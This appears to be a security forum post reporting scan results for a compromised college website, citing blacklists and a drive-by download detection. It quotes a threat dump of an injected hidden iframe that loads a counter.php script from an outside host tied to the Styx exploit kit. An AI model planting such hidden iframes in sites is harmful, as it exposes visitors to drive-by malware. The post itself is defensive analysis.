An update on a scan of mine on Sept. 1st this year: https://forum.avast.com/index.php?topic=154194.0
Website Unsafe Details - https://www.virustotal.com/nl/url/eb8a6539f6c4a433c193d6bd6361b820577bab212888fec7f6c6703fcf48ad1e/analysis/
Drive-by download attack was detected. Comodo analysts' verdict.
Blacklisted site. [ UrlBlacklist details ]
Suspicious iframes detected:
Object: htxp://fmcarbscollege.in/fmcarbscollege.in/%28S%28ir3x1s55dsamsgrkzn5w14vf%29%29/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/Shaql3d2f1gd1rbztnbv2pr55/Default1.aspx
SHA1: 1a7d5487dd1bf002bea23a975c79e6d21874aa07
Name: TrojWare.JS.Iframe.GJ
/default1.aspx
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to ‘extremeplanet dot pl’ (Outdated software detected on redirect site: vulnerable cPanel 11.40.0.19)
Offset: 6018
Threat dump:
[<iframe src="htxp://extremeplanet.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>]
- Read: http://securelist.com/blog/incidents/57478/visit-from-an-old-friend-counter-php/
also known as Styx exploit - Needed to change the FTP and cPanel password from a clean computer!
Threat dump MD5: C921E0B32E0875A225FAAA33344E7CE0
File size[byte]: 6162
File type: ASCII
Page/File MD5: D4E5620E958344EFB3ED51956310288C
Blacklisted: http://safeweb.norton.com/report/show?url=fmcarbscollege.in & http://www.yandex.com/infected?url=fmcarbscollege.in&l10n=en
Not adding to security here: http://sameid.net/ip/182.50.130.121/
100/100% malicious: http://zulu.zscaler.com/submission/show/497df73973baed7d558eda04451e19d4-1418429114
Two fails, two warnings: https://asafaweb.com/Scan?Url=fmcarbscollege.in
Scan duration[sec]: 0.009000
http://rezervacije.sipt.si/elmah.axd/detail?id=83021614-1ae6-463b-a00d-0c1fbf092adf
on: A potentially dangerous Request.QueryString value was detected from the client (foo=“”).
See: http://zerocert.org/?code=f1177c83e0cb8c8b9e5e7e7e4ddaa0c25e6980a71a2fec22e1ad88fe2b8ec58b
XSS vuln. Results from scanning URL: htxp://extremeplanet.pl/scripts/bb_fbslider.js
Number of sources found: 42
Number of sinks found: 12
&
Results from scanning URL: htxp://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
Number of sources found: 261
Number of sinks found: 18
&
with bug report: http://bugs.jqueryui.com/query?status=closed&page=25&col=id&col=reporter&order=reporter&row=description
→ anonymous function as the callback to jQuery .hide
polonus